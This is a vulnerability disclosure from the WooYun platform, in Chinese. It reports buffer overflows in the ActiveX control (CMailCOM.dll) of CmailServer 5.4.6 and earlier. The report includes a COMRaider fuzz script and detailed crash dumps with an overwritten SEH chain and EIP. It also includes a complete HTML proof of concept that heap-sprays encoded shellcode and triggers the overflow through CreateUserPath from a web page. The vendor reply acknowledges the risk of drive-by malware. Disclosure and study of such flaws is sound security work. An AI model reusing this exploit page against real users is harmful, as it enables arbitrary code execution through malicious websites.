2014-03-26:细节已通知厂商并且等待厂商处理中
2014-03-30:厂商已经确认,细节仅向厂商公开
2014-04-09:细节向核心白帽子及相关领域专家公开
2014-04-19:细节向普通白帽子公开
2014-04-29:细节向实习白帽子公开
2014-05-10:细节向公众公开
遥志邮件服务器CmailServer5.4.6及以下版本activex插件(CMailCOM.dll)CreateUserPath、AddAttach、DeleteMailByUID、DeleteMailEx、SetBcc、GetMailDataEx、GetMailInfoEx、Logout、MoveToFolder、MoveToInbox、SetBody、SetCc、SetForwardSign、SetFrom、SetFromUID、SetReadSign、SetReplySign、SetSubject、SetTo等10多个函数存在缓冲区溢出漏洞,该漏洞允许通过恶意网页执行任意代码
详细说明:对遥志邮件服务器CmailServer5.4.6及以下版本activex插件(CMailCOM.dll)CreateUserPath、AddAttach、DeleteMailByUID、DeleteMailEx、SetBcc、GetMailDataEx、GetMailInfoEx、Logout、MoveToFolder、MoveToInbox、SetBody、SetCc、SetForwardSign、SetFrom、SetFromUID、SetReadSign、SetReplySign、SetSubject、SetTo等10多个函数的String参数,构造超长串会导致缓冲区溢出发生,导致覆盖返回地址或seh链从而执行任意代码。
漏洞证明:(先给出CreateUserPath证明,其余在获取到邀请码后上传)
漏洞名称:CreateUserPath函数存在缓冲区溢出漏洞
影响版本:CmailServer5.4.6以下版本
验证环境:winxp中文版sp1 ie6.0(sp3中文,ie6.0-ie7.0)
问题详情:(Fuzz测试结果)
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:6971D9B8-B53E-4C25-A414-76199768A592' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\CMailServer2\CMailCOM.dll"
prototype = "Sub CreateUserPath ( ByVal bsUser As String )"
memberName = "CreateUserPath"
progid = "CMAILCOMLib.POP3"
argCount = 1
arg1=String(3092, "A")
target.CreateUserPath arg1
</script></job></package>
Exception Code: VC_THROW_SEH
Disasm: 77E53887POP ESI(KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1 1583910 CMailCOM.DLL
2 41414141
Called From Returns To
--------------------------------------------------
KERNEL32.77E53887 CMailCOM.156F3C4
CMailCOM.156F3C4 CMailCOM.156A848
CMailCOM.156A848 CMailCOM.15676B1
CMailCOM.15676B1 CMailCOM.155FC05
CMailCOM.155FC05 41414141
Registers:
--------------------------------------------------
EIP 77E53887 -> E06D7363 -> Asc: csmcsm
EAX 0012A98C -> E06D7363 -> Asc: csmcsm
EBX 015848A4 -> 01547E60
ECX 00000000
EDX 0012AA2C -> 01591DE4
EDI 0012AA1C -> 0012AA48
ESI 0012AA1C -> 0012AA48
EBP 0012A9DC -> 0012AA1C
ESP 0012A988 -> 01586430 -> Asc: 0dX0dX
Block Disassembly:
--------------------------------------------------
77E53877LEA EDI,[EBP-3C]
77E5387AREP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77E5387CPOP EDI
77E5387DLEA EAX,[EBP-50]
77E53880PUSH EAX
77E53881CALL [77E41500]
77E53887POP ESI <--- CRASH
77E53888LEAVE
77E53889RETN 10
77E5388CPUSH 18
77E5388EPUSH 77E63028
77E53893CALL 77E5A2D8
77E53898MOV EAX,FS:[18]
77E5389EMOV ESI,[EAX+30]
77E538A1CALL [77E410B8]
ArgDump:
--------------------------------------------------
EBP+8E06D7363
EBP+1200000001
EBP+1600000003
EBP+200012AA10 -> 19930520
EBP+240012ADA1 -> 60015839 -> Asc: 9X9X
EBP+280016EC84 -> 00140008
Stack Dump:
--------------------------------------------------
12A988 30 64 58 01 63 73 6D E0 01 00 00 00 00 00 00 00 [.dX.csm.........]
12A998 87 38 E5 77 03 00 00 00 20 05 93 19 2C AA 12 00 [...w............]
12A9A8 18 9E 58 01 07 00 00 00 00 00 00 00 00 00 00 00 [..X.............]
12A9B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
12A9C8 FF FF FF FF FF FF FF FF 34 0C 00 00 14 E7 12 00 [................]
Exception Code: ACCESS_VIOLATION
Disasm: 41414141?????()
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
Registers:
--------------------------------------------------
EIP 41414141
EAX 00000000
EBX 015848A4 -> 01547E60
ECX 77F5166A -> 56000CC2
EDX 00140608 -> 77FC3460 -> Asc: `4`4
EDI 00000000
ESI 0016EC84 -> 00140008
EBP 41414141
ESP 0012E934 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Block Disassembly:
--------------------------------------------------
41414141????? <--- CRASH
Stack Dump:
--------------------------------------------------
12E934 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E944 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E954 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E964 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E974 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
POC代码:
<html>
<body>
<object classid='clsid:6971D9B8-B53E-4C25-A414-76199768A592' id='target' /></object>
<script>
var nops = unescape("%u9090%u9090");
var shellcode="\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
while (nops.length < 0x100000)
nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode;
var memory = new Array();
for (var i=0;i<250;i++)
memory[i] += nops;
var str = '';
while(str.length < 2048) str += '\x0C\x0C\x0C\x0C'; //
target.CreateUserPath(str);
</script>
</body>
</html>
目前厂商还没有修补措施,可以先禁用activex控件和脚本
版权声明:转载请注明来源 cloud4986@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:11
确认时间:2014-03-30 23:09
厂商回复:可用于挂马威胁,对于白帽子提交的多个漏洞,拟披量收录并协调软件生产厂商。
最新状态:暂无